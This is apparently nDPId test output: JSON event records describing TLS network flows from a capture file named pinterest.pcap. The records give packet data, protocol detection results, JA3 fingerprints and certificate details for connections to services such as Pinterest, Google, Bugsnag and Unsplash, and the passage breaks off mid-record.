-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605289714250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714250,"pkt":"qtsDr8lk5EKm5WPyht1gA+BkACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUgYQBu4mXWd7qkQRvgBAJlouHAAABAQgKz6oyaMK4cmQ="} -00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714250,"flow_last_seen":1605289714250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714250,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605289714250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714250,"pkt":"qtsDr8lk5EKm5WPyht1gCIReACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC5WYBu2PBi7kDA7Y3gBAB9bhLAAABAQgKDEf\/5cK4cls="} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714251,"flow_last_seen":1605289714251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714251,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605289714251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714251,"pkt":"qtsDr8lk5EKm5WPyht1gCQO3ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RPih0IBu\/o5BzSfc9\/MgBAB9chlAAABAQgK4ziLg8K4a4Y="} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605289714281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714281,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuBhOqRBG+Jl1nfgBAm9NLhAAABAQgKwrkiYM+oHbQ="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714288,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgLAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvlZgMDtjdjwYu6gBAMIRHEAAABAQgKwrkiZwxF7DU="} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714288,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAKzZE+IqAcsBIEmLB5kd7IUo3\/YpAbuHQp9z38z6OQc1gBALjSOBAAABAQgKwrkiaOM2b+4="} -00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714558,"flow_last_seen":1605289714558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714558,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605289714558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714558,"pkt":"qtsDr8lk5EKm5WPyht1gA76\/ACgGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt7gBuycnOX0AAAAAoAL9IDgIAAACBAWgBAIICpXXZO8AAAAAAQMDBw=="} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605289714581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714581,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYAGQEAAHoLAAAAAAAAAAAqAcsBIEmLB5kd7IUo3\/YpAbu3uEYmtpAnJzl+oBJXgPrGAAACBAV4AQMDAwQCCArCuSOMlddk7w=="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605289714581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714581,"pkt":"qtsDr8lk5EKm5WPyht1gA76\/ACAGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt7gBuycnOX5GJraRgBAB+37BAAABAQgKlddlBsK5I4w="} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714558,"flow_last_seen":1605289714581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714581,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714590,"flow_last_seen":1605289714590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714590,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605289714590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714590,"pkt":"qtsDr8lk5EKm5WPyht1gDTn6ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnvYBu\/7qRGoAAAAAoAL9IGNfAAACBAWgBAIICskVTwYAAAAAAQMDBw=="} -00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":505,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714558,"flow_last_seen":1605289714615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714615,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605289714616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714616,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbue9py+eGX+6kRroBJXgA2NAAACBAV4AQMDAwQCCArCuSOwyRVPBg=="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605289714616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714616,"pkt":"qtsDr8lk5EKm5WPyht1gDTn6ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnvYBu\/7qRGucvnhmgBAB+5GEAAABAQgKyRVPIMK5I7A="} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714590,"flow_last_seen":1605289714617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714617,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714658,"flow_last_seen":1605289714658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714658,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605289714658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714658,"pkt":"qtsDr8lk5EKm5WPyht1gCBesACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUggABu2pDSXwAAAAAoAL9ILsUAAACBAWgBAIICs+qM\/8AAAAAAQMDBw=="} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714590,"flow_last_seen":1605289714660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714660,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605289714697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714697,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuCAAsx4c9qQ0l9oBJXgI0UAAACBAV4AQMDAwQCCArCuSQBz6oz\/w=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605289714697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714697,"pkt":"qtsDr8lk5EKm5WPyht1gCBesACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUggABu2pDSX0LMeHQgBAB+xD+AAABAQgKz6o0J8K5JAE="} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714658,"flow_last_seen":1605289714698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":575,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714658,"flow_last_seen":1605289714739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289714739,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":583,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1605289714658,"flow_last_seen":1605289714740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":411,"midstream":0,"thread_ts_msec":1605289714740,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714782,"flow_last_seen":1605289714782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714782,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605289714782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714782,"pkt":"qtsDr8lk5EKm5WPyht1gCp8uACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3toBu85LuqIAAAAAoAL9IEOtAAACBAWgBAIICnRgZN4AAAAAAQMDBw=="} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605289714832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714832,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAByAqAcsBIEmLB5kd7IUo3\/YpAbve2qyyOFrOS7qjoBJXgB0bAAACBAV4AQMDAwQCCArCuSSHdGBk3g=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1605289714832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714832,"pkt":"qtsDr8lk5EKm5WPyht1gCp8uACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3toBu85LuqOssjhbgBAB+6D6AAABAQgKdGBlEMK5JIc="} -00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714782,"flow_last_seen":1605289714833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714833,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":870,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714782,"flow_last_seen":1605289714867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714867,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03219{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":876,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289714782,"flow_last_seen":1605289714869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6069,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1605289714869,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","server_names":"imgix2.map.fastly.net,*.camp-fire.jp,*.carwow.co.uk,*.carwow.de,*.carwow.es,*.catchandrelease.com,*.dorothee-schumacher.com,*.footway.com,*.img-ikyu.com,*.imgix.drizly.com,*.instamotor.com,*.microdinc.com,*.msastaging.com,*.peddle.com,*.remax.ca,*.ustudio.com,*.vaping360.com,*.weber.com,article-image-ix.nikkei.com,assets.eberhardt-travel.de,assets.verishop.com,assets.verishop.xyz,cdn.airstream.com,cdn.elementthree.com,cdn.hashnode.com,cdn.naturalhealthyconcepts.com,cdn.parent.eu,cdn.phonehouse.es,cdn.shiplus.co.il,i.drop-cdn.com,i.upworthy.com,image.volunteerworld.com,imageproxy.themaven.net,images-dev.takeshape.io,images.101cookbooks.com,images.beano.com,images.businessoffashion.com,images.congstar.de,images.diesdas.digital,images.fandor.com,images.greetingsisland.com,images.malaecuia.com.br,images.omaze.com,images.roulottesgagnon.com,images.takeshape.io,images.thewanderful.co,images.unsplash.com,images.victoriaplum.com,images.vraiandoro.com,img-1.homely.com.au,img-stack.imagereflow.com,img.badshop.se,img.bernieandphyls.com,img.bioopticsworld.com,img.